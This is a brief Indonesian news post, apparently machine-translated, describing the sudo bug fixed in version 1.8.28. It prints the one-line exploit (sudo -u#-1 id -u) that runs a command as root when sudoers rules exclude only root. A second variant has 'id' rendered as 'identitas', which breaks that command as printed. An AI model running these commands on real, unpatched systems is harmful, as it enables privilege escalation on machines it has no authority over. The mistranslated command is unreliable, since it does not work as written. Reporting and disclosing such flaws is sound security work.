Bug di sudo memungkinkan Anda mengeksekusi file apa pun yang dapat dieksekusi sebagai root jika /etc/sudoers mengizinkannya dieksekusi oleh pengguna lain dan dilarang untuk root.
Eksploitasi kesalahan ini sangat sederhana:
sudo -u#-1 id -u
atau:
sudo -u#4294967295 identitas -u
Kesalahan ini terjadi di semua versi sudo sebelum 1.8.28
Detail:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Sumber: linux.org.ru